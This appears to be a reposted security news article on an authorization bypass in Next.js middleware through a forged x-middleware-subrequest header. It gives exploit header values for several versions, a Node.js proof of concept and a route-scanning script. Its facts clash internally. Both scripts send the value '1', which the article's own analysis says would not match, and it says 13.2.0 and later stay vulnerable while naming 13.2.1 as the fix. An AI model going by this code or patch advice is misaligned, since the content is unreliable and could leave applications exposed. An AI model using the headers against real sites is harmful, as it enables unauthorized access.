By rssfeeds-admin The flaw stems from improper handling of the x-middleware-subrequest header in Next.js middleware, allowing attackers to circumvent authentication and gain unauthorized access to protected routes.
This article provides an in-depth technical analysis, demonstrates proof-of-concept exploits, and outlines mitigation strategies.
Role of x-middleware-subrequest Header
Next.js middleware uses the x-middleware-subrequest header to distinguish internal subrequests—preventing infinite middleware recursion—from external HTTP calls.
The middleware entry point reads this header as follows:
javascriptconst subreq = params.request.headers["x-middleware-subrequest"];
const subrequests = typeof subreq === "string" ? subreq.split(":") : [];
if (subrequests.includes(middlewareInfo.name)) {
result = {
response: NextResponse.next(),
waitUntil: Promise.resolve(),
};
continue;
}
If middlewareInfo.name appears in the header’s value list, the middleware is skipped.
Attackers can forge this header, tricking the server into treating an external request as a subrequest and bypassing authorization checks.
Common NextResponse methods like NextResponse.redirect() and cookie-based JWT checks never execute, effectively granting unrestricted access to sensitive paths.
Exploit Across Next.js Versions
The vulnerability manifests differently across Next.js releases:
Version 12.2 and Earlier
- Middleware filename:
_middleware.tsinpages/directory middlewareInfo.nameequalspages/_middleware- Exploit header: text
x-middleware-subrequest: pages/_middleware
Version 12.2 and Later
- Middleware filename:
middleware.tsat root middlewareInfo.nameequalsmiddleware- Exploit header: text
x-middleware-subrequest: middleware
Version 13.2.0 and Later
- Enforced
MAX_RECURSION_DEPTHprevents excessive loops - Header chains still bypass checks: text
x-middleware-subrequest: middleware:middleware:middleware
By simply setting x-middleware-subrequest To include the appropriate identifier, external requests skip all middleware layers, including JWT or session cookie validations.
Proof-of-Concept and Mitigation Strategies
PoC Exploit with Node.js
javascriptimport fetch from 'node-fetch';
async function exploit() {
const res = await fetch('http://localhost:3000/admin', {
headers: { 'x-middleware-subrequest': '1' }
});
const body = await res.text();
if (body.includes('Admin Panel')) {
console.log('[+] Bypass Successful!');
} else {
console.log('[-] Access Blocked.');
}
}
exploit();
This script targets /admin, sending the malicious header to evade middleware checks.
A similar red-team tool iterates through protected routes:
javascriptconst routes = ['/admin','/dashboard','/settings'];
routes.forEach(async route => {
const res = await fetch(`http://localhost:3000${route}`, {
headers: { 'x-middleware-subrequest': '1' }
});
console.log(`${route}: ${res.status}`);
});
Mitigation
- Header Whitelisting: Reject unexpected
x-middleware-subrequestvalues by validating against known subrequest contexts. - Internal Flag: Use an internal-only flag or signature for subrequests instead of client-controllable headers.
- Strict Mode: Enable Next.js’ strict middleware mode (when available) to enforce header integrity.
- Patch Framework: Upgrade to Next.js ≥13.2.1, which addresses header parsing logic and adds explicit authorization checks around
x-middleware-subrequest.
Organizations should audit custom middleware implementations immediately and deploy patches or workarounds to secure their applications against this high-risk exploit.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Critical Next.js Vulnerability Allows Attackers to Bypass Authorization appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.